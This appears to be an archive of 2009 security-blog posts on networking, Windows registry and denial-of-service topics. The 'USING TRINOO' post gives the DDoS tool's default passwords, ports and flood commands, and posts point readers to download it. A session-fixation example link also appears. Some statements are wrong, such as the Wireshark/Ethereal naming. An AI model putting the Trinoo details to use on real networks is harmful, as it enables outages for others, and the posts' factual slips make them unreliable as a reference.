Host addressing and identification: Each host is assigned a valid Internet Protocol Address which is 32-bits long such as 202.144.216.219
Packet routing: This is the basic task of getting packets of data (datagrams) from source to destination by sending them to the next network node (router) closer to the final destination.

* 3 Transport Layer : The layer's responsibilities include end-to-end message transfer capabilities independent of the underlying network, along with error control, flow control, congestion control (avoiding huge data on a particular single route/channel), and application addressing (port numbers).
* 4 Application Layer : The Application Layer refers to the higher-level protocols used by most applications for network communication. Examples of application layer protocols include the File Transfer Protocol (FTP) and the Hyper Text Transmission Protocol (HTTP).

ENCAPSULATION :

In TCP/IP, as data is being sent from one computer, it will pass from the top layer to the bottom.
On the receiving end, the data will then be rebuilt from the bottom layer to the top. You can view an example of this process below.
Each layer a packet of information travels through adds what is called a header. Each layer a sending packet passes through gains another header.
When the packet is being rebuilt on the receiving end, each header is unpackaged the same way.

EXAMPLE :

Your browser works at the application layer and accepts the initial datagram, say a web page to be sent across the Internet and adds the appropriate header describing the protocol used.
The transport layer protocol and the appropriate protocol header is added to the datagram. This controls many of the aspects in the management and initiation of communication between the two hosts.
In the network layer, routers offer the functionality for the datagram to hop from source to the destination, one hop at a time. This also sees the IP header being added to the datagram.
The physical layer is responsible for the delivery of signals from the source to the destination over a physical communication platform, which in this case is the Ethernet, and the header describing the Ethernet Protocol information is added to the Data Unit.

Putting it All Together - The Data Encapsulation Process

1. One computer requests to send data to another over a network.
2. The data message flows through the Application Layer by using a TCP or UDP port to pass onto the internet layer.
3. The data segment obtains logical addressing at the Internet Layer via the IP protocol, and the data is then encapsulated into a datagram.
4. The datagram enters the Network Access Layer, where software will interface with the physical network. A data frame encapsulates the datagram for entry onto the physical network. At the end of the process, the frame is converted to a stream of bits that is then transmitted to the receiving computer.
5. The receiving computer removes the frame, and passes the packet onto the Internet Layer. The Internet Layer will then remove the header information and send the data to the Transport layer. Likewise, the Transport layer removes header information and passes data to the final layer. At this final layer the data is whole again, and can be read by the receiving computer if no errors are present.

And there you have it: encapsulation at its finest.

Session Fixation

2009-08-07T04:06:00.000-07:00

SESSION FIXATION

Fig. SESSION FIXATION. Click to Enlarge

Session Fixation:

Whenever a visitor ﬁrst visit a page in your application that calls session_start(), then a session is created for the user. PHP generates a random session identiﬁer to identify the user (you can see this identifier by using session_id()) which is also known as session token, and then it sends a Set-Cookie header to the client. By default, the name of this cookie is PHPSESSID, but you can change the cookie name in php.ini or by using the session_name() function. On subsequent visits, the client identiﬁes the user with the cookie, and this is how the application maintains state.

It is possible to set the session identiﬁer manually through the query string, forcing the use of a particular session. This simple attack is called session ﬁxation because the attacker ﬁxes the session. This is most commonly achieved by creating a link to your application and appending the session identiﬁer that the attacker wishes to give any user clicking the link.
<a href="http://yoursite.com/index.php?PHPSESSID=123456">Fix the session</a>

By clicking the above link an would be attacker could get access the protected user’s login credentials and so on. If the user logs in while using the provided session identiﬁer, the attacker may be able to ride on the same session and gain access to the user’s account. This is why session ﬁxation is sometimes referred to as session riding.

Session Hijacking - Introduction

2009-08-07T03:57:00.001-07:00

Session hijacking is when a hacker takes control of a user session after the user has successfully authenticated with a server. Session hijacking involves an attack identifying the current session IDs of a client/server communication and taking over the client’s session. Session hijacking is made possible by tools that perform sequence numbers prediction.

Fig. SESSION HIJACKING . Click to Enlarge

SESSION HIJACKING - Detailed Explanation -How it Works?

Tools : Juggernaut, Hunt, TTY Watcher, IP Watcher, T-Sight

Download the session (8.1 MB) in MP3 format:

What is Session?

2009-08-07T03:33:00.000-07:00

What is Session?

HTTP is known as a stateless protocol. which means that the webserver does not care multiple requests come from the same user. In other words you can say that HTTP don’t remember anything when the execution is finished. After a TCP/IP three-way handshake is completed, a session is created which is used to create a state in between requests even when they occur after weeks from each other.

Sessions are maintained by passing a unique session identiﬁer between requests typically in a cookie (which usually resides in webserver’s file system). Session can also be passed in forms and query arguments. PHP handles sessions transparently through a combination of cookies and URL rewriting, when session.use_trans_sid is turned on in php.ini (it is off by default in PHP5) by generating a unique session ID and using it track a local data store (by default, a ﬁle in the system’s temporary directory in my case /tmp/) where session data is saved at the end of every request.

Caution: session_start() must be called before any output is sent to the browser, because it will try to set a cookie by sending a response header.

Session Security
Most of the other attacks like XSS, CSRF etc could be prevented by ﬁltering input and escaping output, but session attacks cannot. Rather it is necessary to plan for them and identify potential problem areas of your application.

Two notorious forms of session attacks are session ﬁxation and session hijacking.

USING TRINOO

2009-08-07T02:39:00.000-07:00

The trinoo distributed denial-of-service system consists of 3 parts:

The Client: The client is not part of the trinoo package. The telnet or Netcat program is used to connect to port 27665 of the "master." An attacker connects to a master to control the "broadcasts" that will flood a target.

The Master: The master is contained in the file master.c in the trinoo package. While running, it waits for UDP packets going to port 31335. These packets are registration packets from the "broadcast." It also waits for connections to TCP port 27665. When a client connects to port 27665, the master expects the password to be sent before it returns any data. The default password is "betaalmostdone". When the master is run, it displays a "?" prompt, waiting for a password. The password is "gOrave".

The Broadcast (or Beast): The broadcast is the code in trinoo that performs the actual flooding. It is ns.c in the trinoo package. When the broadcast is compiled, the IP addresses of the masters that can control it are hardcoded into the program. Starting the broadcast, a UDP packet is sent to port 31335 of each master IP, containing the data "*HELLO*". This packet registers the broadcast with the master. An attacker can then connect to the master and use the daemons to send a UDP flood.

There are six commands that a client can send to the master to cause the master to communicate with the broadcast. A master sending commands to a broadcast sends a UDP packet to port 27444 of the broadcast. The default password between the master and the broadcast daemon is "l44adsl". These are the six commands the client sends to the master:

- - mtimer: Sets a timer to DoS a target. The master sends a "bbb" command to the broadcast. This packet looks like: "bbb l44adsl 300" when observed on the network.

- - dos: Performs a Denial of Service attack on a machine. The dos command sends an "aaa" command to the broadcast. This packet looks like: "aaa l44adsl 10.1.1.1" when observed on the network.

- - mdie: Kills all broadcasts. An attacker cannot use this command when connected to the master unless an additional password is known, but an attacker can send their own UDP packet with the master-broadcast password ("l44adsl") to kill each of the broadcasts. The master then sends a "d1e" command to the broadcast daemon. This packet looks like: "d1e l44adsl" when observed on the network.

- - mping: Pings all broadcasts. The master sends a "png" command to each broadcast, and the broadcast returns with a "PONG" packet sent to UDP port 31335 of the master. When this packet is transmitted from the master to the broadcast daemon, it looks like: "png 144 adsl".

- - mdos: This command performs a Denial of Service attack on a list of machines. The master sends a "xyz" command to each broadcast. The packet looks like "xyz l44adsl 123:10.1.1.1:10.1.1.2:10.1.1.3:".

- - msize: This command sets the size of the UDP packets to use when performing a Denial of Service attack on a target. It is undocumented in the master's online help system. The master sends a "rsz" command to the broadcast daemon, and the packet looks like "rsz l44adsl 300".

The DoS attack that trinoo broadcasts use is a UDP flood. Trinoo sends a large number of UDP packets containing 4 data bytes (all zeros) and coming from one source port to random destination ports on the target host. The target host returns ICMP Port Unreachable messages. The target host slows down because it is busy processing the UDP packets, and at this point, there will be little or no network bandwidth left.

There is no reliable way to tell the difference between a trinoo flood and a UDP port scan, because it is not possible to determine if someone is monitoring the ICMP messages.

DOWNLOAD TRINOO at Download Mall

Win Anti Zomb [WAZ] - Anti dDOS tool

2009-08-05T21:12:00.000-07:00

WAZ [ Win Anti Zomb ]

Windows Based Anti Zombie Tool.

SecNiche Security [http://www.secniche.org]

WAZ is windows based Anti DDos tool written in VC++ and VC[API]. It comprise of anti symmetric ailment for the most devastating DDos agents termed to be as Zombie Agents. The tools are designed to serve the windows platform and to provide an ease to the users.

The tool is functional and effective in stopping the Ddos agents. You can find lots of Ddos agents like Trinoo, Shaft, Stacheldraht, Mstream etc. They are considered to be the best agents to launch distributed denial of service attacks.

The WAZ consists of : waz_tester.exe & waz_killer.exe

The malformed UDP packets with desired signatures are crafted and sent to the Zombie victim to dethrone the functionality of zombie agents. A test was taken using WireShark.

DOWNLOAD WAZ [Direct Download Links]

waz(v 1.0)-win-anti-zomb.rar | waz(v 1.0)-win-anti-zomb.zip
Visit the SecNiche Security [http://www.secniche.org] to download latest software!!

TRINOO

2009-08-05T20:49:00.000-07:00

Trinoo (TrinOO) was the first DDOS tool to be discovered. Trinoo uses a handler/agent architecture, wherein an attacker sends commands to the handler via TCP and handlers and agents communicate via UDP. Trinoo generates UDP packets of a given size to random ports on one or multiple target addresses, during a specified attack interval. Targets include systems running various services known to have remotely exploitable buffer overflow security bugs, such as wu-ftpd, RPC services for "cmsd", "statd", "ttdbserverd", "amd", etc.

Trinoo provides the ability for attackers to set up the denial of service network, on widely dispersed systems whose true owners don't even know are out of their control.

Trinoo uses the following TCP Ports for its operation:
Attacker to master: 27665/tcp
Master to daemon(slave): 27444/udp
Daemon(slave) to master: 31335/udp
Daemons reside on the systems that launch that the attack, and masters control the daemon systems. Since Trinoo uses TCP, it can be easily detected and disabled.

DOWNLOAD TRINOO at Download Mall

Related Posts :
USING TRINOO

Distributed denial-of-service (DDoS) Attack

2009-08-05T07:52:00.000-07:00

"This post explains DDoS attacks in detail, and also highlights the comparison & advantages over DoS Attacks"

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users.

DDoS attacks require engagement of multiple machines, which will be sending the attack traffic to the victim.
The attacking machines donot belong to the attacker and are frequently called zombies, daemons, slaves, or agents.
Agents(Zombies) are usually poorly secured systems at universities, companies, and homes—even at government institutions.
The attacker breaks into them, takes full control, installs DDoS software on them and launch coordinated attacks them for the attack.
Automated tools discover potential agent machines, break into them, and install the attack code upon a single command from an attacker, and report success back to her.
The master program, at a designated time, then communicates to any number of "agent" programs, installed on computers anywhere on the Internet. The agents, when they receive the command, initiate the attack.
This makes it difficult to detect because attacks originate from several IP addresses.
If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

TOOLS : Shaft, Trinoo, Tribe Flood Network (TFN), Stacheldraht, Tribe Flood Network 200 (TFN2K)

Adding your Own Items to Context Menu - Hacking Windows XP

2009-08-05T05:00:00.000-07:00

Adding an entry to a context menu is very simple. The most difficult part of solving my little puzzle was figuring out how to launch Outlook so it would automatically create a message and attach the desired file to it. After a few minutes on Google researching, I came across Outlook-Tips.net which is a great resource for just the information that I was looking for. According to outlooktips.net, I just had to launch Outlook with the /a switch and the name of the file. Once I had this information, I had all of the pieces of the puzzle and was ready to start putting it together. Perform the following steps to learn how to add your own item to any File Types context menu:

First, open up My Computer.
Click on the Tools menu bar item and select Folder Options.
Click on the File Types tab to expose all of the different file types on your computer.
Because I usually send Word documents, I scrolled down the list of file types and selected the .doc file extension. Pick any other file extension for which you would like to add an entry.
Once you have the entry selected, click the Advanced button to bring up the Edit File type window.
Click the New button to add an entry.
In the Action box, type in the name that you want to appear on the menu. I typed in Send Attached to Message.
In the Application Used to Perform Action box, you will want to specify the application and any switches that you will want to use for this new entry. Click on the Browse button to easily browse to an executable file. I navigated until I found OUTLOOK.EXE inside the OFFICE11 folder.
When you click OK, the path to the executable file will fill the box. Now you will want to add any application flags at the end of the line. To tell Outlook to create a new message and attach a file to it, I had to add /a after the path followed by %L. The %L is a system variable that holds the name of the file that you are right-clicking on. When I was finished, my box looked like the following (including the quotes): "C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE" /a "%L".
When you are finished editing your new entry, click OK to save it.

You are now finished adding an entry to a specific File Types context menu. If you followed all of the previous steps to add the "Send Attached to message" entry, every time you right-click on a Word document, you will now see the new entry, as shown in Figure

CHANGING WINDOWS PHYSICAL(MAC) ADDRESS

2009-08-05T02:15:00.001-07:00

This is depending on the type of Network Interface Card (NIC) you have. If you have a card that doesn’t support Clone MAC address, then try method 2

METHOD 1

a. Start > Run > devmgmt.msc or Open "Device Manager"
b. Choose your desired NIC under the "Network Adapters" category.

c. Right Click on the selected NIC and choose "Properties".
d. Click on “Advanced” tab.
e. Under “Property section”, you should see an item called “Network Address” or "Locally Administered Address", click on it.

f. On the right side, under “Value”, type in the New MAC address you want to assign to your NIC. Usually this value is entered without the “-“ between the MAC address numbers.

g. Goto command prompt and type in “ipconfig /all” or “net config rdr” to verify the changes.

h. If successful, reboot your systems.

METHOD 2

As you can see the above method is very convenient but not all network cards offer such an option. For example, Broadcom 440x 10/100 ( used in Dell Inspiron 1501 laptops ) does not allow to change its MAC address through the Properties window. In such cases the following method will solve the problem.

1. Go to Start > Run and type regedt32 [NOT regedit] in the box to start the registry editor.

2. Go to the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318} and double click on it to expand the tree.

3. Now you can see the subkeys starting with 0000, then 0001, 0002, 0003, 0004 and so on. Each of them represents particular network adapter.

4. Go through each subkey and look for DriverDesc keyword, that matches the network card you want to change the MAC address.

5. Look for a string value named “NetworkAddress”, right click on it and select Modify. Then enter a new MAC address in its value data box. If the value “NetworkAddress” does not exist, then create one with right click on the subkey ( for example 0008 ), then select New > String Value, name the new value as NetworkAddress and repeat the above step.

6. You must restart your computer for the change to take effect.

WIRESHARK

2009-08-04T12:29:00.000-07:00

Fig. WIRESHARK sniffer capturing Live Data on Ubuntu. Click to Enlarge the Image!!

Wireshark is a free packet analyzer computer application. It is used for network troubleshooting and analysis. Its later versions are known by the name "Ethereal".

Data can be captured "from the wire" from a live network connection or read from a file that records the already-captured packets.
Supports a number of protocols, including Ethernet, IEEE 802.11, PPP, and loopback.
Captured network data can be browsed via a GUI, or via the terminal (command line) version of the utility, tshark.
Captured files can be edited or converted to the "editcap" program.
Data display can be refined using a display filter.
Plugins can be created for dissecting new protocols.

DOWNLOAD WIRESHARK

Related Posts :
SNIFFER
SNIFFER - HOW IT WORKS

HKEY_CURRENT_CONFIG [HKCC]

2009-08-02T14:54:00.000-07:00

HKEY_CURRENT_CONFIG [HKCC] :

The information contained in this key is to configure settings such as the software and device drivers to load or the display resolution to use. This key has a software and system subkeys, which keep track of configuration information.

HKCC contains information gathered at runtime; information stored in this key is not permanently stored on the hard disk, but rather regenerated at boot time. It is a handle to the key "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current", which is initially empty but populated at boot time by loading one of the other subkeys stored in "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles".

RELATED POST : FIVE KEYS OF WINDOWS REGISTRY EXPLAINED

HKEY_CLASSES_ROOT [HKCR]

2009-08-02T14:44:00.000-07:00

HKEY_CLASSES_ROOT [HKCR]

The information stored here is used to open the correct application when a file is opened by using Explorer and for Object Linking and Embedding. It is a root key that merges HKLM\SOFTWARE\Classes, and HKCU\Software\Classes.

HKCR contains two types of settings. The first type is file associations that associate different file types with the programs that can open, print, and edit them. The second type is class registrations for Component Object Model (COM) objects.

This root key is one of the most interesting in the registry to customize, because it enables you to change a lot of the operating system's behavior. This root key is also the largest in the registry, accounting for the vast majority of the space that the registry consumes.

COM CLASS KEYS

The key HKCR\CLSID contains COM class registrations. HKCR\CLSID\ clsid is an individual class registration, where clsid is the class's class ID, which is a GUID.

Object	Class identifier
Shell folders
ActiveX Cache	{88C6C381-2E85-11D0-94DE-444553540000}
Computer Search Results	{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}
History	{FF393560-C2A7-11CF-BFF4-444553540000}
Internet Explorer	{871C5380-42A0-1069-A2EA-08002B30309D}
My Computer	{20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Documents	{450D8FBA-AD25-11D0-98A8-0800361B1103}
My Network Places	{208D2C60-3AEA-1069-A2D7-08002B30309D}
Offline Files	{AFDB1F70-2A4C-11D2-9039-00C04F8EEB3E}
Programs	{7BE9D83C-A729-4D97-B5A7-1B7313C39E0A}
Recycle Bin	{645FF040-5081-101B-9F08-00AA002F954E}
Search Results	{E17D4FC0-5564-11D1-83F2-00A0C90DC849}
Shared Documents	{59031A47-3F72-44A7-89C5-5595FE6B30EE}
Start Menu	{48E7CAAB-B918-4E58-A94D-505519C795DC}
Temporary Internet Files	{7BD29E00-76C1-11CF-9DD0-00A0C9034933}
Web	{BDEADF00-C265-11D0-BCED-00A0C90AB50F}
Control Panel folders
Administrative Tools	{D20EA4E1-3957-11D2-A40B-0C5020524153}
Fonts	{D20EA4E1-3957-11D2-A40B-0C5020524152}
Network Connections	{7007ACC7-3202-11D1-AAD2-00805FC1270E}
Printers And Faxes	{2227A280-3AEA-1069-A2DE-08002B30309D}
Scanners And Cameras	{E211B736-43FD-11D1-9EFB-0000F8757FCD}
Scheduled Tasks	{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Control Panel icons
Folder Options	{6DFD7C5C-2451-11D3-A299-00C04F8EF6AF}
Taskbar And Start Menu	{0DF44EAA-FF21-4412-828E-260A8728E7F1}
User Accounts	{7A9D77BD-5403-11D2-8785-2E0420524153}
Other
Add Network Places	{D4480A50-BA28-11D1-8E75-00C04FA31A86}
Briefcase	{85BBD920-42A0-1069-A2E4-08002B30309D}
E-mail	{2559A1F5-21D7-11D4-BDAF-00C04F60B9F0}
Help And Support	{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
Internet	{2559A1F4-21D7-11D4-BDAF-00C04F60B9F0}
Network Setup Wizard	{2728520D-1EC8-4C68-A551-316B684C4EA7}
Run	{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
Search	{2559A1F0-21D7-11D4-BDAF-00C04F60B9F0}
Windows Security	{2559A1F2-21D7-11D4-BDAF-00C04F60B9F0}

HKEY_LOCAL_MACHINE [HKLM]

2009-08-02T14:35:00.000-07:00

HKEY_LOCAL_MACHINE [HKLM] :

This key contains configuration information particular to the computer. This information is stored in the systemroot\system32\config directory as persistent operating system files, with the exception of the volatile hardware key. Settings range from device driver configurations to Windows settings. HKEY_LOCAL_MACHINE is probably the most important key in the registry and it contains five subkeys:

HARDWARE.
Database that describes the physical hardware in the computer, the way device drivers use that hardware, and mappings and related data that link kernel-mode drivers with various user-mode code. The operating system creates this key each time it starts, and it includes information about devices and the device drivers and resources associated with them.
SAM.
Contains the Windows local security database, the Security Accounts Manager (SAM). Windows stores local users and groups in SAM. This key's access control list (ACL) prevents even administrators from viewing it. SAM is a link to the key HKLM\SECURITY\SAM.
SECURITY.
Contains the Windows local security database in the subkey SAM, as well as other security settings. This key's ACL prevents even administrators from viewing it, unless they take ownership of it.
SOFTWARE.
Pre-computer software database. Contains per-computer application settings. Microsoft standardized this key's organization so that programs store settings in HKLM\SOFTWARE\Vendor\Program\Version\. Vendor is the name of the program's publisher, Program is the name of the program, and Version is the program's version number.
SYSTEM.
Database that controls system start-up, device driver loading, NT 4 services and OS behavior. Contains control sets, one of which is current. The remaining sets are available for use by Windows. Each subkey is a control set named ControlSetnnn, where nnn is an incremental number beginning with 001. The operating system maintains at least two control sets to ensure that it can always start properly. These sets contain device driver and service configurations. HKLM\SYSTEM\CurrentControlSet is a link to ControlSetnnn, and the key HKLM\SYSTEM\Select indicates which ControlSetnnn is in use.

Security Identifiers (SIDs)

2009-08-02T14:32:00.000-07:00

Computer accounts, user accounts, groups, and other security-related objects are security principles. Security Identifiers (SIDs) uniquely identify security principles. Each time Windows and Active Directory create a security principle, they generate a SID for it. The Windows Local Security Authority (LSA) generates SIDs for local security principles and then stores them in the local security database.

An example of a SID is S-1-5-21-2857422465-1465058494-1690550294-500. A SID always begins with S-. The next number identifies the SID's version—in this case, version 1. The next number indicates the identifier authority and is usually 5, which is NT Authority. The string of numbers up to 500 is the domain identifier, and the rest of the SID is a relative identifier, which is the account or group. This is a very rough overview of the SID format, which is much more complex than this brief example characterizes. If you want to learn more about SIDs, see http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/security_identifiers.asp.

HKEY_USERS [HKU]

2009-08-02T14:22:00.000-07:00

HKEY_USERS [HKU]:
Windows 95 uses this key to store the user profiles, which were previously stored in systemroot\system32\config or systemroot\profiles directory.

SUBKEYS of HKEY_USERS

HKU contains at least three subkeys:

.DEFAULT contains the per-user settings that Windows uses to display the desktop before any user logs on to the computer. This isn't the same thing as a default user profile, which Windows uses to create settings for users the first time they log on to the computer.
SID, where SID is the security identifier of the console user (the user sitting at the keyboard), contains per-user settings. HKCU is linked to this key. This key contains settings such as the user's desktop preferences and Control Panel settings.
SID_Classes, where SID is the security identifier of the console user, contains per-user class registrations and file associations. Windows merges the contents of keys HKLM\SOFTWARE\Classes and HKU\SID_Classes into HKCR.

Other subkeys you may find are :

S-1-5-18 is the well-known SID for the LocalSystem account. Windows loads this account's profile when a program or service runs in the LocalSystem account.
S-1-5-19 is the well-known SID for the LocalService account. Service Control Manager uses this account to run local services that don't need to run as the LocalSystem account.
S-1-5-20 is the well-known SID for the NetworkService account. Service Control Manager uses this account to run network services that don't need to run as the LocalSystem account.

HKEY_CURRENT_USER [HKCU]

2009-08-02T14:19:00.000-07:00

HKEY_CURRENT_USER [HKCU] :

This registry key contains the configuration information for the user that is currently logged in. The users folders, environment variables, desktop settings, network connections, printers, application preferences, screen colors, and control panel settings are stored here. This information is known as a User Profile.

SUBKEYS of HKEY_CURRENT_USER

AppEvents

Associates sounds with events. For example, it associates sounds with opening menus, minimizing windows, and logging off of Windows.

Console

Stores data for the console subsystem, which hosts all character-mode applications, including the MS-DOS command prompt. In addition, the Console key can contain subkeys for custom command windows.

Control Panel

Contains accessibility, regional, and desktop appearance settings. You configure most of these settings in Control Panel. However, this key contains a handful of useful settings that have no user interface; you can configure them only through the registry.

Environment

Stores environment variables that users have set. Each value associates an environment variable with the string that Windows substitutes for the variable. The default values for these entries are in the user's profile.

Identities

Contains one subkey for each identity in Microsoft Outlook Express. Outlook Express uses identities to allow multiple users to share a single mail client. With the Windows support for user profiles, one user's settings are separate from other users' settings, so this key is seldom necessary to use.

Keyboard Layout

Contains information about the installed keyboard layouts.

Network

Stores information about mapped network drives. Each subkey in Network is a mapped drive to which Windows connects each time the user logs on to the computer. The subkeys' names are the drive letters to which the drives are mapped. Each drive's key contains settings used to reconnect the drive.

Printers

Stores user preferences for printers.

Software

Contains per-user application settings. Windows stores much of its own configuration in this key, too. Microsoft has standardized its organization so that programs store settings in HKCU\Software\Vendor\ Program\ Version\. The variable Vendor is the name of the program's publisher, the variable Program is the name of the program, and the variable Version is the program's version number. Often, as is the case with Windows, Version is simply CurrentVersion.

Volatile Environment

Contains environment variables that were defined when the user logged on to Windows.

Other subkeys you see in HKCU are usually legacy leftovers or uninteresting. They include UNICODE Program Groups, SessionInformation, and Windows 3.1 Migration Status.

Brief History of Windows Registry

2009-08-02T13:34:00.000-07:00

MS-DOS

MS-DOS got its configuration data from Config.sys and Autoexec.bat.
Config.sys loads device drivers
Autoexec.bat used to run programs, set environment variables, and prepare MS-DOS for use.

Windows 3.0

Windows 3.0 provided INI files for storing settings.
INI files are text files that contain one or more sections with one or more settings in each section.
The main problems with INI files are that they provide no hierarchy, storing binary values in them is cumbersome, and they provide no standard for storing similar types of settings.
INI files also cause other subtle problems, all related to the configuration file's inability to build complex relationships between applications and the operating system.
One big problem for early versions of Windows was the sheer number of INI files that floated around on the average computer. Every application had its own INI files.

Windows 3.1
Windows 3.1 introduced the registry as a tool for storing OLE (object linking and embedding) settings.

Windows 95

Windows 95 expanded the registry into the configuration database that Windows XP and Windows Server 2003 use now.
Even though INI files are no longer necessary, you'll always find INI files, including Win.ini, on any computer, at location : C:\WINDOWS\win.ini
No more plain text .INI files splattered all over your system.
In today's environment, the registry replaces these .INI files. Each key in the registry is similar to bracketed headings in an .INI file.

FIVE KEYS - Windows Registry [Detailed Explanation]

2009-08-02T13:23:00.000-07:00

The five keys in Registry Editor are :

Related Post : BRIEF HISTORY OF WINDOWS REGISTRY

Backing up Windows Registry

2009-08-02T12:44:00.000-07:00

This tutorial works only with Windows XP or newer.
Windows 98 and ME uses an inbuilt utility 'scanreg' that back-ups the system.

Backing up the Windows XP registry

Microsoft Windows XP includes a new feature known as system restore. This great new feature enables a user to backup and restore their important system files from an earlier day. By default this feature automatically creates a backup of the system each day. If you wish to create a restore point of your system follow the below steps.

Click Start, Programs, Accessories, System Tools, System Restore
Select the option to Create a restore point
Click next and follow the remainder steps.

Restoring the Windows XP registry

To restore the system back to an earlier point follow the below steps.

Click Start, Programs, Accessories, System Tools, System Restore
Select the Restore my computer to an earlier time option and click next
Select the day and the restore point you wish to restore and click next.

DEMO [Click to Enlarge]

In Windows VISTA, the following dialog comes up!!

Windows Registry Elaborated

2009-08-02T12:41:00.000-07:00

If you donot understand the first paragraph, read about BRIEF HISTORY OF WINDOWS REGISTRY [optional] !!

One of the hot new features introduced with Windows 95 was the Windows Registry. The Windows Registry offered a centralized database-like location to store application and system settings. No more plain text .INI files splattered all over your system. Instead, issue a few easy API calls and your application settings are safely nestled away deep inside the registry hive.

Windows stores configuration data in the registry. The registry is a hierarchical database, which can be described as a central repository for configuration data.

The registry contains extended information, settings, and various other values for the the Microsoft Operating Systems. Within the registry you can control, modify and hack a great majority of the operating system features and tools.

Before going into the Registry and changing or deleting anything, we ALWAYS recommend that you backup the registry.

To view the registry of a Windows Operating System, one would use the Registry Editor tool. Type Start>Run>regedit, or just type in regedit in Windows 7's Start Menu search box. There are two versions of Registry Editor.

Regedt32.exe has the most menu items and more choices for the menu items. You can search for keys and subkeys in the registry.

Regedit.exe enables you to search for strings, values, keys, and subkeys and export keys to .reg files. This feature is useful if you want to find specific data.

For ease of use, the Registry is divided into five separate structures that represent the Registry database in its entirety. These five groups are known as KEYS.
Read this Post on Windows Registry Keys to be able to know about how to hack them.

SMURF Attack

2009-07-31T02:11:00.000-07:00

A broadcast server is a server capable of duplicating a message and sending it to all machines present on the same network. The "smurf" technique is based on the use of broadcast servers to paralyze a network

The scenario of such an attack is as follows:

the attacking machine sends forged packets that contain the spoofed source address of the attacker's intended victim (i.e. providing the IP address of a target machine) to one or more broadcast servers.
the broadcast server passes on the request to the entire network
all of the network's machines send a response to the broadcast server
the broadcast server redirects the responses to the target machine.

As such, when the attacking machine sends a request to several broadcast servers located on different networks, all of the responses from computers on the various networks will be routed to the target machine.

In this way the bulk of the attacker's work involves finding a list of broadcast servers and falsifying the response address in order to direct them to the target machine.

SYN FLOOD

2009-07-30T14:29:00.000-07:00

Prerequisite : In order to understnad a SYN Flood completely, you must understand the TCP-IP 3-way HandShake

A SYN packet notifies a server of a new connection. The server then allocates some memory in order to handle the incoming connection, sends back an acknowledgement, then waits for the client to complete the connection and start sending data. By spoofing large numbers of SYN requests, an attacker can fill up memory on the server, which will sit their waiting for more data that never will arrive. Once memory has filled up, the server will be unable to accept connections from legitimate clients. This effectively disables the server.

Key point: SYN floods exploit a flaw in the core of the TCP/IP technology itself. There is no complete defense against this attack. There are, however, partial defenses. Servers can be configured to reserve more memory and decrease the amount of time they wait for connections to complete. Likewise, routers and firewalls can filter out some of the spoofed SYN packets. Finally, there are techniques (such as "SYN cookies") that can play tricks with the protocol in order to help distinguish good SYNs from bad ones.

SYN Flood. The attacker sends several packets but does not send the "ACK" back to the server. The connections are hence half-opened and consuming server resources. Alice, a legitimate user, tries to connect but the server refuses to open a connection resulting in a denial of service.

The CERT advisory on SYN Flooding includes an up-to-date list of the vendors who have patches for this attack. All server systems are vulnerable unless patched if traffic from the Internet (or any hostile network) are permitted.

How does a DOS attack works - Behind the Scenes

2009-07-30T13:33:00.000-07:00

There are two main approaches to denying a service:

a FLOODING ATTACK, sending a vast number of seemingly legitimate messages.
&
a VULNERABILITY ATTACK, exploiting a vulnerability present on the target

FLOODING ATTACK : Flooding or Bandwidth attacks are attempts to consume resources, such as network bandwidth or equipment throughput. High-data-volume attacks can consume all available bandwidth between an ISP and your site. The link fills up, and legitimate traffic slows down. Timeouts may occur, causing retransmission, generating even more traffic.

Flooding attacks work by sending a vast number of messages whose processing requires the server to allocate some key resource at the target. Once the server allocates its key resource to the attack, legitimate users cannot receive service. The crucial feature of flooding attacks is that their strength lies in the volume, so the flow of traffic must be so large as to consume the target's resources. If the attacker engages more than one machine to send out the attack traffic, then it is known as a DDoS attack.

Techniques : SYN Flood, Smurf, Fraggle

VULNERABILITY ATTACKS : Malicious messages by the attacker represent an unexpected input that the application programmer did not foresee. The messages cause the target application to go into an infinite loop; to severely slow down, crash, freeze, or reboot a machine; or to consume a vast amount of memory and deny service to legitimate users.
Techniques : teardrop, land, ping of death, Naptha

Denial of Service (DOS) Attack

2009-07-30T12:47:00.000-07:00

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. During a Denial of Service (DoS) attack, a hacker renders a system unusable or significantly slows the system by over-loading resources or preventing legitimate users from accessing the system. This denial-of-service effect is achieved by sending messages to the target that interfere with its operation, and make it hang, crash, reboot, or do useless work.

The goal of DoS or DDoS isn’t to gain unauthorized access to machines or data, but to prevent legitimate users of a service from using it.
A DoS attack may do the following:

Flood a network with traffic, thereby preventing legitimate network traffic.
Disrupt connections between two machines, thereby preventing access to a service.
Prevent a particular individual from accessing a service.
Disrupt service to a specific system or person.

Both DoS and DDoS attacks are hard to handle. Defenses (firewalls, IDS, closed ports, patches updated) that work well against many other kinds of attacks are not necessarily effective against denial of service. The attack can consist of traffic that the firewall finds acceptable, probably because it bears a close resemblance to legitimate traffic. Since the DoS attack merely needs to exhaust resources, it can work on any port left open. Attackers can perform DoS attacks on machines that have no vulnerabilities, so patches to close vulnerabilities may not help.

Techniques : SYN Flood, Smurf, teardrop, land, ping of death
Tools : SSPing, Land Exploit, Smurf, Syn Flood, Jolt2, WinNuke, Targa

Related Posts :
Distributed denial-of-service attack (DDoS attack)
HOW DOS ATTACKS WORK - BEHIND THE SCENES

Secret Keys - A description

2009-07-19T04:07:00.000-07:00

We all know how the lock on a door works. There are a series of small round bars called tumblers that, when lined up correctly, drop out of the way, removing the obstruction, so you can turn the key and open the door. But, just because you know how a door lock works does not mean that you can find the right key. It takes a lot of time and trouble to find the correct key.

Similarly,

